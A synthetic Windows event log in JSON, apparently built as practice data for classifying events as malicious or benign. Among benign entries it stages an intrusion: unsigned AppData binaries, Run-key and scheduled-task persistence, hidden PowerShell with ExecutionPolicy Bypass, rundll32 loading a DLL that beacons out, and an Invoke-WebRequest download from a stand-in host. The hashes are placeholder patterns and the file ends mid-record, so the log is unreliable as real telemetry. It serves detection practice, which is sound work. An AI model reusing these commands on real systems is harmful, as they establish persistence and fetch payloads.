#i edited the actual "windows log", we have here to make sure it included all the paramters of a real windows event log so i can get better results and data
#i think it would be a fun challenge to eventually be able to tale every single event id in the file and return malicious or bengin! 


[

  {
    "event_id": 4624,
    "timestamp": "2026-07-10T08:01:14Z",
    "computer_name": "ANONYMOUS-WS01",
    "channel": "Security",
    "provider": "Microsoft-Windows-Security-Auditing",
    "level": "Information",
    "user": "j.smith",
    "domain": "SECURITY",
    "logon_id": "0x12FA91",
    "process_name": "C:\\Windows\\System32\\winlogon.exe",
    "image_path": "C:\\Windows\\System32\\winlogon.exe",
    "parent_process": "C:\\Windows\\System32\\smss.exe",
    "parent_pid": 512,
    "pid": 844,
    "command_line": "winlogon.exe",
    "registry_path": null,
    "network_ip": "192.168.1.25",
    "network_port": 3389,
    "action": "User logon",
    "hash_sha256": "8f2c7d9d9a7f0a1d6c4c3a91b9a5a2e4d7b8c9f00123456789abcdef012345",
    "signed": true,
    "severity": "Information",
    "description": "A user authentication event was recorded.",
    "source": "Windows Security Event Log"
  },

  {
    "event_id": 4688,
    "timestamp": "2026-07-10T11:03:44Z",
    "computer_name": "ANONYMOUS-WS01",
    "channel": "Security",
    "provider": "Microsoft-Windows-Security-Auditing",
    "level": "Information",
    "user": "j.smith",
    "domain": "SECURITY",
    "logon_id": "0x12FA91",
    "process_name": "C:\\Users\\j.smith\\AppData\\Roaming\\Microsoft\\Windows\\update.exe",
    "image_path": "C:\\Users\\j.smith\\AppData\\Roaming\\Microsoft\\Windows\\update.exe",
    "parent_process": "C:\\Windows\\explorer.exe",
    "parent_pid": 4316,
    "pid": 11452,
    "command_line": "update.exe --silent",
    "registry_path": null,
    "network_ip": "185.199.108.153",
    "network_port": 443,
    "action": "Process created",
    "hash_sha256": "b7f2a98c31d4e8f9123d8f7a2d9f8c7b6a5e4d3c2b1a00998877665544332211",
    "signed": false,
    "severity": "Information",
    "description": "A process creation event was recorded.",
    "source": "Windows ETW Process Monitoring"
  },

  {
    "event_id": 4657,
    "timestamp": "2026-07-10T11:04:01Z",
    "computer_name": "ANONYMOUS-WS01",
    "channel": "Security",
    "provider": "Microsoft-Windows-Security-Auditing",
    "level": "Information",
    "user": "j.smith",
    "domain": "SECURITY",
    "logon_id": "0x12FA91",
    "process_name": "C:\\Users\\j.smith\\AppData\\Roaming\\Microsoft\\Windows\\update.exe",
    "image_path": "C:\\Users\\j.smith\\AppData\\Roaming\\Microsoft\\Windows\\update.exe",
    "parent_process": "C:\\Windows\\explorer.exe",
    "parent_pid": 4316,
    "pid": 11452,
    "command_line": "reg.exe add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run",
    "registry_path": "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\WindowsUpdate",
    "network_ip": null,
    "network_port": null,
    "action": "Registry value modified",
    "hash_sha256": "b7f2a98c31d4e8f9123d8f7a2d9f8c7b6a5e4d3c2b1a00998877665544332211",
    "signed": false,
    "severity": "Information",
    "description": "A registry modification event was recorded.",
    "source": "Windows ETW Registry Monitoring"
  },
  {
    "event_id": 4688,
    "timestamp": "2026-07-10T09:17:22Z",
    "computer_name": "ANONYMOUS-WS01",
    "channel": "Security",
    "provider": "Microsoft-Windows-Security-Auditing",
    "level": "Information",
    "user": "j.smith",
    "domain": "SECURITY",
    "logon_id": "0x12FA91",
    "process_name": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE",
    "image_path": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE",
    "parent_process": "C:\\Windows\\explorer.exe",
    "parent_pid": 4316,
    "pid": 6240,
    "command_line": "\"C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE\" \"C:\\Users\\j.smith\\Documents\\Quarterly_Report.docx\"",
    "registry_path": null,
    "network_ip": null,
    "network_port": null,
    "action": "Process created",
    "hash_sha256": "1ab45de7789234567890abcd1234ef567890abcd1234567890abcdef12345678",
    "signed": true,
    "severity": "Information",
    "description": "A process creation event was recorded.",
    "source": "Windows ETW Process Monitoring"
  },

  {
    "event_id": 5156,
    "timestamp": "2026-07-10T09:19:11Z",
    "computer_name": "ANONYMOUS-WS01",
    "channel": "Security",
    "provider": "Microsoft-Windows-Windows Filtering Platform",
    "level": "Information",
    "user": "j.smith",
    "domain": "SECURITY",
    "logon_id": "0x12FA91",
    "process_name": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE",
    "image_path": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE",
    "parent_process": "C:\\Windows\\explorer.exe",
    "parent_pid": 4316,
    "pid": 6240,
    "command_line": "\"WINWORD.EXE\"",
    "registry_path": null,
    "network_ip": "10.0.0.15",
    "network_port": 443,
    "action": "Network connection allowed",
    "hash_sha256": "1ab45de7789234567890abcd1234ef567890abcd1234567890abcdef12345678",
    "signed": true,
    "severity": "Information",
    "description": "A network connection was permitted.",
    "source": "Windows Firewall Event Log"
  },

  {
    "event_id": 4688,
    "timestamp": "2026-07-10T10:02:36Z",
    "computer_name": "ANONYMOUS-WS01",
    "channel": "Security",
    "provider": "Microsoft-Windows-Security-Auditing",
    "level": "Information",
    "user": "administrator",
    "domain": "SECURITY",
    "logon_id": "0x3FA91",
    "process_name": "C:\\Windows\\System32\\cmd.exe",
    "image_path": "C:\\Windows\\System32\\cmd.exe",
    "parent_process": "C:\\Windows\\explorer.exe",
    "parent_pid": 4316,
    "pid": 7440,
    "command_line": "cmd.exe /c ipconfig /all",
    "registry_path": null,
    "network_ip": null,
    "network_port": null,
    "action": "Process created",
    "hash_sha256": "aa11223344556677889900ffeeddccbbaa99887766554433221100ffeeddccbb",
    "signed": true,
    "severity": "Information",
    "description": "A command shell process was created.",
    "source": "Windows ETW Process Monitoring"
  },

  {
    "event_id": 7045,
    "timestamp": "2026-07-10T10:45:13Z",
    "computer_name": "ANONYMOUS-WS01",
    "channel": "System",
    "provider": "Service Control Manager",
    "level": "Information",
    "user": "NT AUTHORITY\\SYSTEM",
    "domain": "NT AUTHORITY",
    "logon_id": "0x3E7",
    "process_name": "C:\\Windows\\System32\\services.exe",
    "image_path": "C:\\Program Files\\7-Zip\\7zFM.exe",
    "parent_process": "C:\\Windows\\System32\\services.exe",
    "parent_pid": 956,
    "pid": 8236,
    "command_line": "\"C:\\Program Files\\7-Zip\\7zFM.exe\"",
    "registry_path": "HKLM\\SYSTEM\\CurrentControlSet\\Services\\7zipUpdater",
    "network_ip": null,
    "network_port": null,
    "action": "Service configuration changed",
    "hash_sha256": "bb223344556677889900aabbccddeeff11223344556677889900aabbccddeeff",
    "signed": true,
    "severity": "Information",
    "description": "A service configuration change was recorded.",
    "source": "Windows Service Control Manager"
  },

  {
    "event_id": 4688,
    "timestamp": "2026-07-10T11:03:44Z",
    "computer_name": "ANONYMOUS-WS01",
    "channel": "Security",
    "provider": "Microsoft-Windows-Security-Auditing",
    "level": "Information",
    "user": "j.smith",
    "domain": "SECURITY",
    "logon_id": "0x12FA91",
    "process_name": "C:\\Users\\j.smith\\AppData\\Roaming\\Microsoft\\Windows\\update.exe",
    "image_path": "C:\\Users\\j.smith\\AppData\\Roaming\\Microsoft\\Windows\\update.exe",
    "parent_process": "C:\\Windows\\explorer.exe",
    "parent_pid": 4316,
    "pid": 11452,
    "command_line": "update.exe --silent",
    "registry_path": null,
    "network_ip": "185.199.108.153",
    "network_port": 443,
    "action": "Process created",
    "hash_sha256": "b7f2a98c31d4e8f9123d8f7a2d9f8c7b6a5e4d3c2b1a00998877665544332211",
    "signed": false,
    "severity": "Information",
    "description": "A process creation event was recorded.",
    "source": "Windows ETW Process Monitoring"
  },

  {
    "event_id": 4688,
    "timestamp": "2026-07-10T11:05:22Z",
    "computer_name": "ANONYMOUS-WS01",
    "channel": "Security",
    "provider": "Microsoft-Windows-Security-Auditing",
    "level": "Information",
    "user": "j.smith",
    "domain": "SECURITY",
    "logon_id": "0x12FA91",
    "process_name": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
    "image_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
    "parent_process": "C:\\Users\\j.smith\\AppData\\Roaming\\Microsoft\\Windows\\update.exe",
    "parent_pid": 11452,
    "pid": 11884,
    "command_line": "powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden",
    "registry_path": null,
    "network_ip": null,
    "network_port": null,
    "action": "Process created",
    "hash_sha256": "cc3344556677889900aabbccddeeff0011223344556677889900aabbccddeeff",
    "signed": true,
    "severity": "Information",
    "description": "A process creation event was recorded.",
    "source": "Windows ETW Process Monitoring"
  },

  {
    "event_id": 4698,
    "timestamp": "2026-07-10T11:06:10Z",
    "computer_name": "ANONYMOUS-WS01",
    "channel": "Security",
    "provider": "Microsoft-Windows-Security-Auditing",
    "level": "Information",
    "user": "j.smith",
    "domain": "SECURITY",
    "logon_id": "0x12FA91",
    "process_name": "C:\\Windows\\System32\\schtasks.exe",
    "image_path": "C:\\Windows\\System32\\schtasks.exe",
    "parent_process": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
    "parent_pid": 11884,
    "pid": 12120,
    "command_line": "schtasks /create /tn WindowsUpdateCheck /tr C:\\Users\\j.smith\\AppData\\Roaming\\Microsoft\\Windows\\update.exe /sc daily",
    "registry_path": null,
    "network_ip": null,
    "network_port": null,
    "action": "Scheduled task created",
    "hash_sha256": "dd4455667788990011223344556677889900aabbccddeeff0011223344556677",
    "signed": true,
    "severity": "Information",
    "description": "A scheduled task creation event was recorded.",
    "source": "Windows Task Scheduler Log"
  },
  {
    "event_id": 4657,
    "timestamp": "2026-07-10T11:07:02Z",
    "computer_name": "ANONYMOUS-WS01",
    "channel": "Security",
    "provider": "Microsoft-Windows-Security-Auditing",
    "level": "Information",
    "user": "j.smith",
    "domain": "SECURITY",
    "logon_id": "0x12FA91",
    "process_name": "C:\\Users\\j.smith\\AppData\\Roaming\\Microsoft\\Windows\\update.exe",
    "image_path": "C:\\Users\\j.smith\\AppData\\Roaming\\Microsoft\\Windows\\update.exe",
    "parent_process": "C:\\Windows\\explorer.exe",
    "parent_pid": 4316,
    "pid": 11452,
    "command_line": "update.exe --silent",
    "registry_path": "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\WindowsUpdate",
    "network_ip": null,
    "network_port": null,
    "action": "Registry value modified",
    "hash_sha256": "b7f2a98c31d4e8f9123d8f7a2d9f8c7b6a5e4d3c2b1a00998877665544332211",
    "signed": false,
    "severity": "Information",
    "description": "A registry modification event was recorded.",
    "source": "Windows ETW Registry Monitoring"
  },

  {
    "event_id": 11,
    "timestamp": "2026-07-10T11:08:44Z",
    "computer_name": "ANONYMOUS-WS01",
    "channel": "Microsoft-Windows-Sysmon/Operational",
    "provider": "Sysmon",
    "level": "Information",
    "user": "j.smith",
    "domain": "SECURITY",
    "logon_id": "0x12FA91",
    "process_name": "C:\\Users\\j.smith\\AppData\\Roaming\\Microsoft\\Windows\\update.exe",
    "image_path": "C:\\Users\\j.smith\\AppData\\Roaming\\Microsoft\\Windows\\update.exe",
    "parent_process": "C:\\Windows\\explorer.exe",
    "parent_pid": 4316,
    "pid": 11452,
    "command_line": "update.exe --silent",
    "registry_path": null,
    "network_ip": null,
    "network_port": null,
    "action": "File created",
    "hash_sha256": "b7f2a98c31d4e8f9123d8f7a2d9f8c7b6a5e4d3c2b1a00998877665544332211",
    "signed": false,
    "severity": "Information",
    "description": "A file system event was recorded.",
    "source": "Sysmon File Monitoring"
  },

  {
    "event_id": 4688,
    "timestamp": "2026-07-10T11:10:16Z",
    "computer_name": "ANONYMOUS-WS01",
    "channel": "Security",
    "provider": "Microsoft-Windows-Security-Auditing",
    "level": "Information",
    "user": "j.smith",
    "domain": "SECURITY",
    "logon_id": "0x12FA91",
    "process_name": "C:\\Windows\\System32\\rundll32.exe",
    "image_path": "C:\\Windows\\System32\\rundll32.exe",
    "parent_process": "C:\\Users\\j.smith\\AppData\\Roaming\\Microsoft\\Windows\\update.exe",
    "parent_pid": 11452,
    "pid": 12444,
    "command_line": "rundll32.exe C:\\Users\\j.smith\\AppData\\Roaming\\Microsoft\\Windows\\cache.dll,Start",
    "registry_path": null,
    "network_ip": null,
    "network_port": null,
    "action": "Process created",
    "hash_sha256": "ee55667788990011223344556677889900aabbccddeeff001122334455667788",
    "signed": true,
    "severity": "Information",
    "description": "A process creation event was recorded.",
    "source": "Windows ETW Process Monitoring"
  },

  {
    "event_id": 5156,
    "timestamp": "2026-07-10T11:12:03Z",
    "computer_name": "ANONYMOUS-WS01",
    "channel": "Security",
    "provider": "Microsoft-Windows-Windows Filtering Platform",
    "level": "Information",
    "user": "j.smith",
    "domain": "SECURITY",
    "logon_id": "0x12FA91",
    "process_name": "C:\\Windows\\System32\\rundll32.exe",
    "image_path": "C:\\Windows\\System32\\rundll32.exe",
    "parent_process": "C:\\Users\\j.smith\\AppData\\Roaming\\Microsoft\\Windows\\update.exe",
    "parent_pid": 11452,
    "pid": 12444,
    "command_line": "rundll32.exe C:\\Users\\j.smith\\AppData\\Roaming\\Microsoft\\Windows\\cache.dll,Start",
    "registry_path": null,
    "network_ip": "45.77.23.19",
    "network_port": 443,
    "action": "Network connection allowed",
    "hash_sha256": "ee55667788990011223344556677889900aabbccddeeff001122334455667788",
    "signed": true,
    "severity": "Information",
    "description": "A network connection was permitted.",
    "source": "Windows Firewall Event Log"
  },

  {
    "event_id": 4663,
    "timestamp": "2026-07-10T11:14:27Z",
    "computer_name": "ANONYMOUS-WS01",
    "channel": "Security",
    "provider": "Microsoft-Windows-Security-Auditing",
    "level": "Information",
    "user": "j.smith",
    "domain": "SECURITY",
    "logon_id": "0x12FA91",
    "process_name": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
    "image_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
    "parent_process": "C:\\Users\\j.smith\\AppData\\Roaming\\Microsoft\\Windows\\update.exe",
    "parent_pid": 11452,
    "pid": 11884,
    "command_line": "powershell.exe Get-ChildItem C:\\Users\\j.smith\\Documents",
    "registry_path": null,
    "network_ip": null,
    "network_port": null,
    "action": "Object access attempt",
    "hash_sha256": "cc3344556677889900aabbccddeeff0011223344556677889900aabbccddeeff",
    "signed": true,
    "severity": "Information",
    "description": "An object access event was recorded.",
    "source": "Windows Security Audit"
  },

  {
    "event_id": 4688,
    "timestamp": "2026-07-10T11:18:39Z",
    "computer_name": "ANONYMOUS-WS01",
    "channel": "Security",
    "provider": "Microsoft-Windows-Security-Auditing",
    "level": "Information",
    "user": "administrator",
    "domain": "SECURITY",
    "logon_id": "0x3FA91",
    "process_name": "C:\\Windows\\System32\\mmc.exe",
    "image_path": "C:\\Windows\\System32\\mmc.exe",
    "parent_process": "C:\\Windows\\explorer.exe",
    "parent_pid": 4316,
    "pid": 13520,
    "command_line": "mmc.exe services.msc",
    "registry_path": null,
    "network_ip": null,
    "network_port": null,
    "action": "Process created",
    "hash_sha256": "ff667788990011223344556677889900aabbccddeeff00112233445566778899",
    "signed": true,
    "severity": "Information",
    "description": "A process creation event was recorded.",
    "source": "Windows ETW Process Monitoring"
  },

  {
    "event_id": 7045,
    "timestamp": "2026-07-10T11:22:11Z",
    "computer_name": "ANONYMOUS-WS01",
    "channel": "System",
    "provider": "Service Control Manager",
    "level": "Information",
    "user": "NT AUTHORITY\\SYSTEM",
    "domain": "NT AUTHORITY",
    "logon_id": "0x3E7",
    "process_name": "C:\\Windows\\System32\\services.exe",
    "image_path": "C:\\Windows\\System32\\svchost.exe",
    "parent_process": "C:\\Windows\\System32\\services.exe",
    "parent_pid": 956,
    "pid": 14560,
    "command_line": "svchost.exe -k netsvcs",
    "registry_path": "HKLM\\SYSTEM\\CurrentControlSet\\Services\\DiagTrack",
    "network_ip": null,
    "network_port": null,
    "action": "Service started",
    "hash_sha256": "00112233445566778899aabbccddeeff00112233445566778899aabbccddeeff",
    "signed": true,
    "severity": "Information",
    "description": "A service state change was recorded.",
    "source": "Windows Service Control Manager"
  },
  {
    "event_id": 4688,
    "timestamp": "2026-07-10T11:25:04Z",
    "computer_name": "ANONYMOUS-WS01",
    "channel": "Security",
    "provider": "Microsoft-Windows-Security-Auditing",
    "level": "Information",
    "user": "NT AUTHORITY\\SYSTEM",
    "domain": "NT AUTHORITY",
    "logon_id": "0x3E7",
    "process_name": "C:\\Windows\\System32\\MoUsoCoreWorker.exe",
    "image_path": "C:\\Windows\\System32\\MoUsoCoreWorker.exe",
    "parent_process": "C:\\Windows\\System32\\svchost.exe",
    "parent_pid": 14560,
    "pid": 15124,
    "command_line": "MoUsoCoreWorker.exe -Embedding",
    "registry_path": null,
    "network_ip": null,
    "network_port": null,
    "action": "Process created",
    "hash_sha256": "1029384756102938475610293847561029384756102938475610293847561029",
    "signed": true,
    "severity": "Information",
    "description": "A process creation event was recorded.",
    "source": "Windows ETW Process Monitoring"
  },

  {
    "event_id": 5156,
    "timestamp": "2026-07-10T11:25:42Z",
    "computer_name": "ANONYMOUS-WS01",
    "channel": "Security",
    "provider": "Microsoft-Windows-Windows Filtering Platform",
    "level": "Information",
    "user": "NT AUTHORITY\\SYSTEM",
    "domain": "NT AUTHORITY",
    "logon_id": "0x3E7",
    "process_name": "C:\\Windows\\System32\\MoUsoCoreWorker.exe",
    "image_path": "C:\\Windows\\System32\\MoUsoCoreWorker.exe",
    "parent_process": "C:\\Windows\\System32\\svchost.exe",
    "parent_pid": 14560,
    "pid": 15124,
    "command_line": "MoUsoCoreWorker.exe -Embedding",
    "registry_path": null,
    "network_ip": "13.107.4.50",
    "network_port": 443,
    "action": "Network connection allowed",
    "hash_sha256": "1029384756102938475610293847561029384756102938475610293847561029",
    "signed": true,
    "severity": "Information",
    "description": "A network connection was permitted.",
    "source": "Windows Firewall Event Log"
  },

  {
    "event_id": 4688,
    "timestamp": "2026-07-10T11:31:18Z",
    "computer_name": "ANONYMOUS-WS01",
    "channel": "Security",
    "provider": "Microsoft-Windows-Security-Auditing",
    "level": "Information",
    "user": "j.smith",
    "domain": "SECURITY",
    "logon_id": "0x12FA91",
    "process_name": "C:\\Windows\\System32\\notepad.exe",
    "image_path": "C:\\Windows\\System32\\notepad.exe",
    "parent_process": "C:\\Windows\\explorer.exe",
    "parent_pid": 4316,
    "pid": 16244,
    "command_line": "notepad.exe C:\\Users\\j.smith\\Desktop\\notes.txt",
    "registry_path": null,
    "network_ip": null,
    "network_port": null,
    "action": "Process created",
    "hash_sha256": "2039485761203948576120394857612039485761203948576120394857612039",
    "signed": true,
    "severity": "Information",
    "description": "A process creation event was recorded.",
    "source": "Windows ETW Process Monitoring"
  },
  {
    "event_id": 11,
    "timestamp": "2026-07-10T11:35:49Z",
    "computer_name": "ANONYMOUS-WS01",
    "channel": "Microsoft-Windows-Sysmon/Operational",
    "provider": "Sysmon",
    "level": "Information",
    "user": "j.smith",
    "domain": "SECURITY",
    "logon_id": "0x12FA91",
    "process_name": "C:\\Users\\j.smith\\AppData\\Local\\Temp\\printer_driver.exe",
    "image_path": "C:\\Users\\j.smith\\AppData\\Local\\Temp\\printer_driver.exe",
    "parent_process": "C:\\Windows\\explorer.exe",
    "parent_pid": 4316,
    "pid": 17120,
    "command_line": "printer_driver.exe /install",
    "registry_path": null,
    "network_ip": null,
    "network_port": null,
    "action": "File created",
    "hash_sha256": "3049587612304958761230495876123049587612304958761230495876123049",
    "signed": false,
    "severity": "Information",
    "description": "A file system event was recorded.",
    "source": "Sysmon File Monitoring"
  },
  {
    "event_id": 4688,
    "timestamp": "2026-07-10T11:36:03Z",
    "computer_name": "ANONYMOUS-WS01",
    "channel": "Security",
    "provider": "Microsoft-Windows-Security-Auditing",
    "level": "Information",
    "user": "j.smith",
    "domain": "SECURITY",
    "logon_id": "0x12FA91",
    "process_name": "C:\\Users\\j.smith\\AppData\\Local\\Temp\\printer_driver.exe",
    "image_path": "C:\\Users\\j.smith\\AppData\\Local\\Temp\\printer_driver.exe",
    "parent_process": "C:\\Windows\\explorer.exe",
    "parent_pid": 4316,
    "pid": 17120,
    "command_line": "printer_driver.exe /install",
    "registry_path": null,
    "network_ip": null,
    "network_port": null,
    "action": "Process created",
    "hash_sha256": "3049587612304958761230495876123049587612304958761230495876123049",
    "signed": false,
    "severity": "Information",
    "description": "A process creation event was recorded.",
    "source": "Windows ETW Process Monitoring"
  },
  {
    "event_id": 4698,
    "timestamp": "2026-07-10T11:37:21Z",
    "computer_name": "ANONYMOUS-WS01",
    "channel": "Security",
    "provider": "Microsoft-Windows-Security-Auditing",
    "level": "Information",
    "user": "j.smith",
    "domain": "SECURITY",
    "logon_id": "0x12FA91",
    "process_name": "C:\\Windows\\System32\\schtasks.exe",
    "image_path": "C:\\Windows\\System32\\schtasks.exe",
    "parent_process": "C:\\Users\\j.smith\\AppData\\Local\\Temp\\printer_driver.exe",
    "parent_pid": 17120,
    "pid": 17440,
    "command_line": "schtasks /create /tn PrinterHelper /tr C:\\Users\\j.smith\\AppData\\Local\\Temp\\printer_driver.exe /sc onlogon",
    "registry_path": null,
    "network_ip": null,
    "network_port": null,
    "action": "Scheduled task created",
    "hash_sha256": "4059681723405968172340596817234059681723405968172340596817234059",
    "signed": true,
    "severity": "Information",
    "description": "A scheduled task creation event was recorded.",
    "source": "Windows Task Scheduler Log"
  },

  {
    "event_id": 4657,
    "timestamp": "2026-07-10T11:40:55Z",
    "computer_name": "ANONYMOUS-WS01",
    "channel": "Security",
    "provider": "Microsoft-Windows-Security-Auditing",
    "level": "Information",
    "user": "administrator",
    "domain": "SECURITY",
    "logon_id": "0x3FA91",
    "process_name": "C:\\Windows\\System32\\reg.exe",
    "image_path": "C:\\Windows\\System32\\reg.exe",
    "parent_process": "C:\\Windows\\System32\\cmd.exe",
    "parent_pid": 7440,
    "pid": 18112,
    "command_line": "reg query HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall",
    "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall",
    "network_ip": null,
    "network_port": null,
    "action": "Registry query",
    "hash_sha256": "5069782834506978283450697828345069782834506978283450697828345069",
    "signed": true,
    "severity": "Information",
    "description": "A registry access event was recorded.",
    "source": "Windows ETW Registry Monitoring"
  },
  {
    "event_id": 4688,
    "timestamp": "2026-07-10T11:44:12Z",
    "computer_name": "ANONYMOUS-WS01",
    "channel": "Security",
    "provider": "Microsoft-Windows-Security-Auditing",
    "level": "Information",
    "user": "j.smith",
    "domain": "SECURITY",
    "logon_id": "0x12FA91",
    "process_name": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe",
    "image_path": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe",
    "parent_process": "C:\\Windows\\explorer.exe",
    "parent_pid": 4316,
    "pid": 19240,
    "command_line": "\"chrome.exe\" https://mail.security.local",
    "registry_path": null,
    "network_ip": null,
    "network_port": null,
    "action": "Process created",
    "hash_sha256": "6172839405617283940561728394056172839405617283940561728394056172",
    "signed": true,
    "severity": "Information",
    "description": "A process creation event was recorded.",
    "source": "Windows ETW Process Monitoring"
  },

  {
    "event_id": 5156,
    "timestamp": "2026-07-10T11:44:30Z",
    "computer_name": "ANONYMOUS-WS01",
    "channel": "Security",
    "provider": "Microsoft-Windows-Windows Filtering Platform",
    "level": "Information",
    "user": "j.smith",
    "domain": "SECURITY",
    "logon_id": "0x12FA91",
    "process_name": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe",
    "image_path": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe",
    "parent_process": "C:\\Windows\\explorer.exe",
    "parent_pid": 4316,
    "pid": 19240,
    "command_line": "\"chrome.exe\" https://mail.security.local",
    "registry_path": null,
    "network_ip": "10.0.0.50",
    "network_port": 443,
    "action": "Network connection allowed",
    "hash_sha256": "6172839405617283940561728394056172839405617283940561728394056172",
    "signed": true,
    "severity": "Information",
    "description": "A network connection was permitted.",
    "source": "Windows Firewall Event Log"
  },

  {
    "event_id": 4688,
    "timestamp": "2026-07-10T11:51:47Z",
    "computer_name": "ANONYMOUS-WS01",
    "channel": "Security",
    "provider": "Microsoft-Windows-Security-Auditing",
    "level": "Information",
    "user": "j.smith",
    "domain": "SECURITY",
    "logon_id": "0x12FA91",
    "process_name": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
    "image_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
    "parent_process": "C:\\Windows\\explorer.exe",
    "parent_pid": 4316,
    "pid": 20332,
    "command_line": "powershell.exe -NoProfile Get-Process",
    "registry_path": null,
    "network_ip": null,
    "network_port": null,
    "action": "Process created",
    "hash_sha256": "7283940561728394056172839405617283940561728394056172839405617283",
    "signed": true,
    "severity": "Information",
    "description": "A process creation event was recorded.",
    "source": "Windows ETW Process Monitoring"
  },

  {
    "event_id": 4104,
    "timestamp": "2026-07-10T11:52:02Z",
    "computer_name": "ANONYMOUS-WS01",
    "channel": "Microsoft-Windows-PowerShell/Operational",
    "provider": "PowerShell",
    "level": "Information",
    "user": "j.smith",
    "domain": "SECURITY",
    "logon_id": "0x12FA91",
    "process_name": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
    "image_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
    "parent_process": "C:\\Windows\\explorer.exe",
    "parent_pid": 4316,
    "pid": 20332,
    "command_line": "powershell.exe -NoProfile Get-Process",
    "registry_path": null,
    "network_ip": null,
    "network_port": null,
    "action": "PowerShell script block logged",
    "hash_sha256": "7283940561728394056172839405617283940561728394056172839405617283",
    "signed": true,
    "severity": "Information",
    "description": "PowerShell script execution was recorded.",
    "source": "PowerShell Operational Log"
  },

  {
    "event_id": 4688,
    "timestamp": "2026-07-10T12:03:18Z",
    "computer_name": "ANONYMOUS-WS01",
    "channel": "Security",
    "provider": "Microsoft-Windows-Security-Auditing",
    "level": "Information",
    "user": "j.smith",
    "domain": "SECURITY",
    "logon_id": "0x12FA91",
    "process_name": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
    "image_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
    "parent_process": "C:\\Users\\j.smith\\AppData\\Roaming\\Microsoft\\Windows\\update.exe",
    "parent_pid": 11452,
    "pid": 21144,
    "command_line": "powershell.exe -ExecutionPolicy Bypass -Command Invoke-WebRequest https://cdn-files.example.net/a.dat -OutFile C:\\Users\\j.smith\\AppData\\Local\\Temp\\a.dat",
    "registry_path": null,
    "network_ip": "104.21.55.22",
    "network_port": 443,
    "action": "Process created",
    "hash_sha256": "8394056172839405617283940561728394056172839405617283940561728394",
    "signed": true,
    "severity": "Information",
    "description": "A process creation event was recorded.",
    "source": "Windows ETW Process Monitoring"
  },

  {
    "event_id": 11,
    "timestamp": "2026-07-10T12:04:01Z",
    "computer_name": "ANONYMOUS-WS01",
    "channel": "Microsoft-Windows-Sysmon/Operational",
    "provider": "Sysmon",
    "level": "Information",
    "user": "j.smith",
    "domain": "SECURITY",
    "logon_id": "0x12FA91",
    "process_name": "C:\\Users\\j.smith\\AppData\\Local\\Temp\\a.dat",
    "image_path": "C:\\Users\\j.smith\\AppData\\Local\\Temp\\a.dat",
    "parent_process": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
    "parent_pid": 21144,
    "pid": 21500,
    "command_line": "a.dat",
    "registry_path": null,
    "network_ip": null,
    "network_port": null,
    "action": "File created",
    "hash_sha256": "9405617283940561728394056172839405617283940561728394056172839405",
    "signed": false,
    "severity": "Information",
    "description": "A file system event was recorded.",
    "source": "Sysmon File Monitoring"
  },

  {
    "event_id": 4688,
    "timestamp": "2026-07-10T12:09:36Z",
    "computer_name": "ANONYMOUS-WS01",
    "channel": "Security",
    "provider": "Microsoft-Windows-Security-Auditing",
    "level": "Information",
    "user": "administrator",
    "domain": "SECURITY",
    "logon_id": "0x3FA91",
    "process_name": "C:\\Windows\\System32\\taskmgr.exe",
    "image_path": "C:\\Windows\\System32\\taskmgr.exe",
    "parent_process": "C:\\Windows\\explorer.exe",
    "parent_pid": 4316,
    "pid": 22120,
    "command_line": "taskmgr.exe",
    "registry_path": null,
    "network_ip": null,
    "network_port": null,
    "action": "Process created",
    "hash_sha256": "a5167283940561728394056172839405617283940561728394056172839405",
    "signed": true,
    "severity": "Information",
    "description": "A process creation event was recorded.",
    "source": "Windows ETW Process Monitoring"
  },
  {
    "event_id": 4624,
    "timestamp": "2026-07-10T12:15:08Z",
    "computer_name": "ANONYMOUS-WS01",
    "channel": "Security",
    "provider": "Microsoft-Windows-Security-Auditing",
    "level": "Information",
    "user": "administrator",
    "domain": "SECURITY",
    "logon_id": "0x4BC221",
    "process_name": "C:\\Windows\\System32\\winlogon.exe",
    "image_path": "C:\\Windows\\System32\\winlogon.exe",
    "parent_process": "C:\\Windows\\System32\\smss.exe",
    "parent_pid": 512,
    "pid": 844,
    "command_line": "winlogon.exe",
    "registry_path": null,
    "network_ip": "192.168.1.25",
    "network_port": 3389,
    "action": "User logon",
    "hash_sha256": "b6172839405617283940561728394056172839405617283940561728394056",
    "signed": true,
    "severity": "Information",
    "description": "A user authentication event was recorded.",
    "source": "Windows Security Event Log"
  },

  {
    "event_id": 4688,
    "timestamp": "2026-07-10T12:16:44Z",
    "computer_name": "ANONYMOUS-WS01",
    "channel": "Security",
    "provider": "Microsoft-Windows-Security-Auditing",
    "level": "Information",
    "user": "administrator",
    "domain": "SECURITY",
    "logon_id": "0x4BC221",
    "process_name": "C:\\Windows\\System32\\mmc.exe",
    "image_path": "C:\\Windows\\System32\\mmc.exe",
    "parent_process": "C:\\Windows\\explorer.exe",
